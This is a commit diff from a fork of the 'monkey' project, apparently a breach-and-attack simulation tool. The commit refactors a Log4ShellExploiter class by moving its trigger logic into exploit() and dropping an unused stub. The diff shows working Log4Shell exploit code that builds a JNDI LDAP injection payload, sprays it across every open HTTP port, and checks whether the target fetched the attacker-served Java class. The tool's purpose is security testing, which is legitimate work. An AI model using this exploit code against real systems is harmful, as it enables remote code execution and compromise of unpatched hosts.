forked from p34709852/monkey
Agent: remove unused upload_monkey() and rename _trigger_exploit
This commit is contained in:
parent
7bace927f8
commit
0cd6b1e616
|
@ -84,26 +84,6 @@ class Log4ShellExploiter(WebRCE):
|
|||
# If java class was downloaded it means that victim is vulnerable
|
||||
return Log4ShellExploiter.HTTPHandler.class_downloaded
|
||||
|
||||
def _trigger_exploit(self):
|
||||
# Try to exploit all services,
|
||||
# because we don't know which services are running and on which ports
|
||||
open_ports = [
|
||||
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
|
||||
]
|
||||
for exploit in get_log4shell_service_exploiters():
|
||||
for port in open_ports:
|
||||
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
|
||||
|
||||
# Wait for request
|
||||
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
|
||||
|
||||
if Log4ShellExploiter.HTTPHandler.class_downloaded:
|
||||
self.exploit_info["vulnerable_service"] = {
|
||||
"service_name": exploit.service_name,
|
||||
"port": port,
|
||||
}
|
||||
return
|
||||
|
||||
def build_ldap_payload(self):
|
||||
interface_ip = get_interface_to_target(self.host.ip_addr)
|
||||
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
|
||||
|
@ -132,11 +112,25 @@ class Log4ShellExploiter(WebRCE):
|
|||
else:
|
||||
return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)
|
||||
|
||||
def upload_monkey(self, url, commands=None):
|
||||
pass
|
||||
|
||||
def exploit(self, url, command):
|
||||
pass
|
||||
# Try to exploit all services,
|
||||
# because we don't know which services are running and on which ports
|
||||
open_ports = [
|
||||
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
|
||||
]
|
||||
for exploit in get_log4shell_service_exploiters():
|
||||
for port in open_ports:
|
||||
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
|
||||
|
||||
# Wait for request
|
||||
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
|
||||
|
||||
if Log4ShellExploiter.HTTPHandler.class_downloaded:
|
||||
self.exploit_info["vulnerable_service"] = {
|
||||
"service_name": exploit.service_name,
|
||||
"port": port,
|
||||
}
|
||||
return
|
||||
|
||||
class HTTPHandler(http.server.BaseHTTPRequestHandler):
|
||||
|
||||
|
|
Loading…
Reference in New Issue